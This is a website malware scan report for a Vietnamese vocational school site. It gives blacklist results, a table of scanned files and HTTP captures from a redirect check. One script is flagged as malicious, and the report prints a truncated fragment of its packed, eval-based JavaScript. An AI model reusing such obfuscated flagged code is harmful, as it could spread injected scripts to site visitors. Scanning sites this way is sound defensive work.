Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=daynghebachviet.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://daynghebachviet.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://daynghebachviet.com/ | 200 OK Content-Length: 16487 Content-Type: text/html | clean |
http://daynghebachviet.com/js/Tianyon.js | 200 OK Content-Length: 4521 Content-Type: application/x-javascript | clean |
http://daynghebachviet.com/js/Common.js | 200 OK Content-Length: 4730 Content-Type: application/x-javascript | clean |
http://daynghebachviet.com/JumAnh/magicthumb-packed.js | 200 OK Content-Length: 19789 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('b 7={2X:\'1.2V\',z:{H:!!(h.1G&&!h.1r),2Z:!!(h.1G&&!h.2x),31:!!(h.32&&h.2x),1r:!!h.1r,2T:17.1i.P(\'3n/\')>-1,3h:17.1i.P(\'3g\')>-1& Antivirus reports:
| ||
http://daynghebachviet.com/Java/swfobject1.5.js | 200 OK Content-Length: 6887 Content-Type: application/x-javascript | clean |
http://daynghebachviet.com/Default.aspx | 200 OK Content-Length: 16487 Content-Type: text/html | clean |
http://daynghebachviet.com/GioiThieu.aspx | 200 OK Content-Length: 25004 Content-Type: text/html | clean |
http://daynghebachviet.com/GiangVien.aspx | 200 OK Content-Length: 13915 Content-Type: text/html | clean |
http://daynghebachviet.com/TinTuc.aspx | 200 OK Content-Length: 19113 Content-Type: text/html | clean |
http://daynghebachviet.com/HinhAnh.aspx | 200 OK Content-Length: 22759 Content-Type: text/html | clean |
http://daynghebachviet.com/Video.aspx | 200 OK Content-Length: 20248 Content-Type: text/html | clean |
http://daynghebachviet.com/LienHe.aspx | 200 OK Content-Length: 21279 Content-Type: text/html | clean |
http://daynghebachviet.com/WebResource.axd?d=k11TlDn9zE6JuUA0Bly7BgpC92Z0-X1Fhl6naO13Hdsq9quRthUQofTqZA01M0ap5MwbBxXOkDakxI-eZxI4ZKqsOTk1&t=635307949035781250 | 200 OK Content-Length: 20794 Content-Type: application/x-javascript | clean |
http://daynghebachviet.com/WebResource.axd?d=KxQF1bEIYavkaEmIojaP6jqn4AcGolreg2h5CMSoHE0fGkAUfd-IHy3ZCnlsZD2DpS2V6nP6kcXMMbMVuO-tyAAh0sM1&t=635307949035781250 | 200 OK Content-Length: 21547 Content-Type: application/x-javascript | clean |
http://daynghebachviet.com/Nghe.aspx?dm=1 | 200 OK Content-Length: 296519 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: daynghebachviet.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 16 Apr 2014 00:56:34 GMT
Server: Microsoft-IIS/6.0
Content-Length: 16487
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=nrwq1r55jlfvbx55teierp55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
...16487 bytes of data.
GET / HTTP/1.1
Host: daynghebachviet.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 16 Apr 2014 00:56:34 GMT
Server: Microsoft-IIS/6.0
Content-Length: 16487
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=nrwq1r55jlfvbx55teierp55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
...16487 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: daynghebachviet.com
Referer: http://www.google.com/search?q=daynghebachviet.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: daynghebachviet.com
Referer: http://www.google.com/search?q=daynghebachviet.com
Result:
The result is similar to the first query. There are no suspicious redirects found.